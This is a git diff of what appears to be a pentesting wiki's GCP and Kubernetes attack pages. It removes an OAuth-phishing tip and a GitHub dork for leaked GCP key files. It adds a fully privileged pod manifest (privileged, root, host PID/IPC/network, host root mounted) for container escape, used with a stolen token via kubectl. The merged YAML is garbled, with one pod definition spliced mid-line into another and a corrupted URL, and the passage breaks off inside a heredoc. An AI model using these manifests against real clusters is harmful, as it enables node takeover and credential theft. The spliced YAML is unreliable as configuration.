diff --git a/cloud-security/gcp-security/README.md b/cloud-security/gcp-security/README.md index 9b0c8a2a..679fb616 100644 --- a/cloud-security/gcp-security/README.md +++ b/cloud-security/gcp-security/README.md @@ -259,14 +259,6 @@ We've automated this completely using [this python script](https://gitlab.com/gi [gcp-buckets-brute-force-and-privilege-escalation.md](gcp-buckets-brute-force-and-privilege-escalation.md) {% endcontent-ref %} -#### Phishing - -You could **OAuth phish** a user with high privileges. - -#### Dorks - -* **Github**: auth\_provider\_x509\_cert\_url extension:json - ## Generic GCP Security Checklists * [Google Cloud Computing Platform CIS Benchmark](https://www.cisecurity.org/cis-benchmarks/) diff --git a/pentesting/pentesting-kubernetes/hardening-roles-clusterroles/README.md b/pentesting/pentesting-kubernetes/hardening-roles-clusterroles/README.md index 015f5516..6ee3c779 100644 --- a/pentesting/pentesting-kubernetes/hardening-roles-clusterroles/README.md +++ b/pentesting/pentesting-kubernetes/hardening-roles-clusterroles/README.md @@ -40,7 +40,7 @@ rules: verbs: ["create", "list", "get"] ``` -### Pod Creation - Steal Token +### Pod Create - Steal Token An attacker with permission to create a pod in the “kube-system” namespace can create cryptomining containers for example. Moreover, if there is a **service account with privileged permissions, by running a pod with that service the permissions can be abused to escalate privileges**. @@ -77,11 +77,16 @@ So just create the malicious pod and expect the secrets in port 6666: ![](<../../../.gitbook/assets/image (464).png>) -### **Pod Creation & Escape - Mount Root** +### **Pod Create & Escape** -Having Pod create permissions over kube-system you can also be able to mount directories from the node hosting the pods with a pod template like the following one: +The following definition gives all the privileges a container can have: -{% code title="mount_root.yaml" %} +* **Privileged access** (disabling protections and setting capabilities) +* **Disable namespaces hostIPC and hostPid** that can help to escalate privileges +* **Disable hostNetwork** namespace, giving access to steal nodes cloud privileges and better access to networks +* **Mount hosts / inside the container** + +{% code title="super_privs.yaml" %} ```yaml apiVersion: v1 kind: Pod @@ -96,7 +101,32 @@ spec: volumeMounts: - mountPath: /mnt name: volume - volumes: + volumes:apiVersion: v1 +kind: Pod +metadata: + name: ubuntu + labels: + app: ubuntu +spec: + # Uncomment and specify a specific node you want to debug + # nodeName: + containers: + - image: ubuntu + command: + - "sleep" + - "3600" # adjust this as needed -- use only as long as you need + imagePullPolicy: IfNotPresent + name: ubuntu + securityContext: + allowPrivilegeEscalation: true + privileged: true + #capabilities: + # add: ["NET_ADMIN", "SYS_ADMIN"] # add the capabilities you need https://man7.org/linux/man-pages/man7/capabilities.7.html + runAsUser: 0 # run as root (or any other user) + restartPolicy: Never # we want to be intentional about running this pod + hostIPC: true # Use the host's ipc namespace https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html + hostNetwork: true # Use the host's network namespace https://www.man7.org/linux/man-pages/man7/network_namespaces.7.html + hostPID: true # Use the host's pid namespace https://man7.org/linux/man-pages/man7/pid_namespaces.7.htmlpe_ - name: volume hostPath: path: / @@ -109,60 +139,23 @@ Create the pod with: kubectl --token $token create -f mount_root.yaml ``` -And capturing the reverse shell you can find the `/` directory (the entire filesystem) of the node mounted in `/mnt` inside the pod. - -**Instead of getting a reverse shell you might just wanto to execute a pod using kubectl with the filesystem mounted and get a shell on it:** - -1. Create a "hostpath volume mount" `pod` manifest. - - ``` - cat > hostpath.yml <